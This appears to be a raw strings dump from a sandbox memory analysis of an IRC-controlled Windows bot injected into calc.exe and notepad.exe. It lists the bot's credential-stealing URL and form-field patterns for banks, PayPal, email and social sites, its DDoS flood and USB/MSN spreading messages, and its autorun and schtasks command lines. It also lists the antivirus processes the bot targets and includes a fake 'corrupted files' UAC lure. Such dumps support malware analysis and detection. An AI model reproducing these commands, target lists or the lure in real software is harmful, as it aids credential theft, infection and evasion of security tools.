%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
Secur32.dll
ShellExecuteA
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
WS2_32.dll
MSVCRT.dll
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
RegNotifyChangeKeyValue
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
7 767<7~7
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
shlwapi.dll
crypt32.dll
wtsapi32.dll
samcli.dll
netutils.dll
userenv.dll
WindowsSecondaryDesktop
\charmap.exe
\Windows Media Player\wmprph.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
Aadvapi32.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

calc.exe_2036:

.text
`.data
.rsrc
SHELL32.dll
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
GDI32.dll
USER32.dll
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
calc.pdb
j.OXO
_acmdln
RegCloseKey
RegOpenKeyExA
name="Microsoft.Windows.Shell.calc"
version="5.1.0.0"
<description>Windows Shell</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
CalcMsgPumpWnd
The requested operation may take a very long time to complete.
Do you want to let the calculation continue, or stop the operation now?
Windows Calculator application file
5.1.2600.0 (xpclient.010817-1148)
CALC.EXE
Windows
Operating System
5.1.2600.0
Operation was canceled.-Calc does not have enough memory to continue.eThe requested function may take a very long time to complete.
Do you want to abort the operation now?
calc.hlp
Cannot open Clipboard.TThere is not enough memory for data.
calc.chm

notepad.exe_1608:

.text
`.data
.rsrc
comdlg32.dll
SHELL32.dll
WINSPOOL.DRV
COMCTL32.dll
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
notepad.chm
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
notepad.pdb
t%SSh
_acmdln
RegCloseKey
RegCreateKeyW
RegOpenKeyExA
SetViewportExtEx
GetKeyboardLayout
name="Microsoft.Windows.Shell.notepad"
version="5.1.0.0"
<description>Windows Shell</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
&*$#$$#$*
MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM
*.txt
/.SETUP
5.1.2600.5512 (xpsp.080413-2105)
NOTEPAD.EXE
Windows
Operating System
5.1.2600.5512
notepad.hlp
Text Documents (*.txt)
You cannot quit Windows because the Save As dialog
dialog box, and then try quitting Windows again.
Common Dialog error (0xx)
Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.
Not a valid file name.MCannot create the %% file.
Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.
Page %d
Ln %d, Col %d

calc.exe_2036_rwx_000A0000_00002000:

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
463893504
2bp3h.exe
rptj8.exe
efljd.exe
gbbcw.exe
ahy0m.exe
rkbfb.exe
2dsd5.exe
lkxwg.exe
y0gb3.exe
v8fes.exe
po3j3.exe
0hf3s.exe
t23e8.exe
0wckx.exe
co4ye.exe
wqlej.exe
r778l.exe
3du3i.exe
r7fz1.exe
user32.dll
urlmon.dll
URLDownloadToFileA
wininet.dll
hXXp://VVV.google.com

calc.exe_2036_rwx_00970000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\calc.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\calc.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

calc.exe_2036_rwx_00A00000_00027000:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
PSSVSSh
RPVSSh
PSSh(
PSSh#
PSSh'
PSSh&
PSSh*
9p.uV

calc.exe_2036_rwx_00A28000_0006B000:

Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nss3.dll
Urlmon.dll
URLDownloadToFileW
Netapi32.dll
76487-640-1457236-23837
76487-337-8429955-22614
76487-644-3177037-23510
76497-640-6308873-23835
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-0716662-23535
76487-644-8648466-23106
00426-293-8170032-85146
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
snxhk.dll
comctl32.dll
ZwSetValueKey
ZwDeleteValueKey
SOFTWARE\%s
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
JOIN
PRIVMSG
.rdata
cmd_option.%s
/c %s
cmd.exe
msvcrt.dll
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
xul.dll
<Port>
<Pass>
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
?pid=%d
?page=%d
?id=%u
%s=%u&%s=%s
%s=%s&%s=%u
&%s=%s
&%s%u=
&%s%hu=
&%s=_%u
%d|%s|%s|%s
.info
httpget
GET /%s HTTP/1.1
Host: %s
Content-Length: %d
Accept: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Encoding: %s
User-Agent: %s
Referer: %s
Connection: %s
hXXp://
iexplore.exe
firefox.exe
tbb-firefox.exe
%s:%hu
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
hXXp://%s%s/image.php?id=%s
TaskDialogIndirect
hXXp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ntdll.dll
kernel32.dll
secur32.dll
crypt32.dll
user32.dll
advapi32.dll
wininet.dll
shell32.dll
shlwapi.dll
ole32.dll
version.dll
sfc.dll
dnsapi.dll
ws2_32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
8"808]9|9
9%9 919<9
=(=/=6==={=
4 4?4^4}4
6o6g6r6w6
9 9$9(90949
.text
`.rdata
@.data
.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Invalid parameter passed to C runtime function.
GetProcessWindowStation
USER32.DLL
RegSetKeySecurity
RegEnumKeyA
ADVAPI32.dll
GDI32.dll
GetNamedPipeHandleStateA
CreateIoCompletionPort
DisconnectNamedPipe
GetNamedPipeInfo
PeekNamedPipe
GetProcessHeap
SetProcessShutdownParameters
GetCPInfo
KERNEL32.dll
.EGDF
-TQ}9J3
l.Bt.,
Y%U(q
>.Rm4xon}V^
jdB .toN@&
#)CM%D
qu.kP
{-Qn}-
 %Fj 7
o!L.Zy
.mvry
Ryx.ps
n}.cK
{ww%f
%c;sk
h%S4m
.FdT=
Software\Classes\CLSID\%S
G:%S_0xX
chrome.exe
opera.exe
safari.exe
maxthon.exe
:Mozilla\Firefox\Profiles
cookies.sqlite
%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
%s\winsxs\%s\comctl32.dll
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
%s:*:Enabled
avcuf32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
prstrui.exe
Windows Defender
MpClient.dll
Windows Defender\MSASCui.exe
MpSvc.dll
msseces.exe
MsMpEng.exe
MSASCui.exe
MpAsDesc.dll
MsMpLics.dll
avgui.exe
avgidsagent.exe
avgwdsvc.exe
avgdiagex.exe
avgmfapx.exe
avgupd.exe
avgcfgex.exe
avgnt.exe
avguard.exe
avshadow.exe
avcenter.exe
update.dll
updaterc.dll
usrreq.exe
ccsvchst.exe
symerr.exe
NIS.exe
NAV.exe
navw32.exe
avastui.exe
AvastEmUpdate.exe
ashUpd.exe
WRSA.exe
zatray.exe
ForceField.exe
updating.dll
fshoster32.exe
fsaua.dll
PSUNMain.exe
PSUAService.exe
PSANHost.exe
PSUNScan.dll
epavjobs.exe
AVENGINE.exe
Upgrader.exe
adaware.exe
BullGuard.exe.manifest
BullGuardUpdate.exe
BullGuard.exe
BullGuardScanner.exe
BullGuardBhvScanner.exe
BullGuardUpdate2.exe
BgScan.exe
BgScanEngine.dll
.manifest
updater.exe
Backup\RSD\RSSetup\updater.exe
RsTray.exe
RavMonD.exe
RsMgrSvc.exe
rsmain.exe
RsScan.dll
RsTray.dll
mbamgui.exe
mbam.exe
pctsGui.exe
pctsAuxs.exe
pctsSvc.exe
Update.exe
UpdateHlpr.dll
Definitions\vcore.dll
sbamui.exe
SBAMTray.exe
updater_client_mod.dll
FProtTray.exe
FPWin.exe
scf.dat
ALUpdate.exe
update_tmp.exe
arcaclean.exe
BavUpdater.exe
rcfp.exe
CLPSLA.exe
op_mon.exe
niu.exe
K7TSUpdT.exe
sguardxup.exe
ccupdate.exe
caupdate.dll
a2guard.exe
a2start.exe
a2service.exe
AVKTray.exe
GDSC.exe
AVK.exe
GDFirewallTray.exe
Bka.exe
BLuPro.exe
BkavSystemServer.exe
BkavService.exe
LiveUpdate.dll
LiveConnect.dll
BaseFile\Bkav\LiveUpdate.dll
V3Lite.exe
ASDSvc.exe
autoup.exe
downloader.exe
%s.config
updatesrv.exe
updatemgr.dll
egui.exe
ekrn.exe
x86\ekrn.exe
uWinMgr.exe
coreServiceShell.exe
uiSeAgnt.exe
uiWatchDog.exe
plugins\plugUpdater.dll
UiFrmwrk\uiUpdateTray.exe
coreFrameworkHost.exe
mcagent.exe
McSvHost.exe
McUICnt.exe
McPvTray.exe
mcui_exe
mcpltui_exe
mcshell.exe
mcupdmgr.exe
mcupdate.exe
mcshield.exe
mcupdui.dll
McAPExe.exe
.config
Image File Execution Options\%s
SYSTEM\CurrentControlSet\services\%s
%c:\ntusbdriver.sys
%c:\*p.exe
%c:\%s
p.exe
%WinDir%\explorer.exe
/C start /d. %s&"%s"
%COMSPEC%
%WinDir%\system32\shell32.dll
%c:\%s.lnk
VisthAux.exe
explorer.exe
t.minecraft
Works! PID: %d, Name: %s
cmdvirth
%s%s\X
tcp://
svchost.exe
csrss.exe
lsass.exe
smss.exe
wscript.exe
cscript.exe
vbc.exe
rundll32.exe
regsvr32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
winlogon.exe
services.exe
%s\x.lnk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
desktop.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
wintrust.dll
chrome.dll
Applications\iexplore.exe\shell\open\command
%s_xx
x.zip
Navw32.exe
SysInspector.exe
avscan.exe
mfefire.exe
wuauclt.exe
WerFault.exe
lFileZilla\sitemanager.xml
port
Sites.dat
Quick.dat
%s\3\%s
%s\4\%s
spoolsv.exe
steam.exe
skype.exe
origin.exe
dwm.exe
tapi3.dll
/C copy "%s" "%s"
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Windows Update Service
"%s" /%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST
schtasks.exe
/DELETE /TN "Windows Update Check - 0xX" /F
\Windows\Explorer.exe
Low_X
%s.manifest
PendingFileRenameOperations
%s\X
Windows\CurrentVersion\Run
CurrentVersion\Windows
Windows NT\CurrentVersion\Image File Execution Options\%s
Windows has encountered a corrupted folder on your hard drive
Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.
Corrupted folder: %s
Corrupted file count: %d
<a href=".ms">%s</a>
/c start "" "%s" /%s "%s"
shell32,ShellExec_RunDLL "%s" /%s "%s"
You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.
Windows 3.1 Update Service
%s:Zone.Identifier
%s\X.pif
KERNEL32.DLL
KERNELBASE.DLL
ekernel32.dll
kernelbase.dll
Website Copier [Offline Browser]
WinHTTrack Website Copier, Copy Websites to Your Computer
3.47.21
WinHTTrack.exe
WinHTTrack Website Copier

notepad.exe_1608_rwx_000A0000_00029000:

.text
`.data
.rsrc
@.reloc
*windows defender*
*windowsupdate*
*drweb*
dwwin.exe
kernel32.dll
iphlpapi.dll
GetExtendedTcpTable
GetOwnerModuleFromTcpEntry
%systemroot%
%programfiles%\Common Files\*\*.exe
%appdata%\Identities\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"
%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe
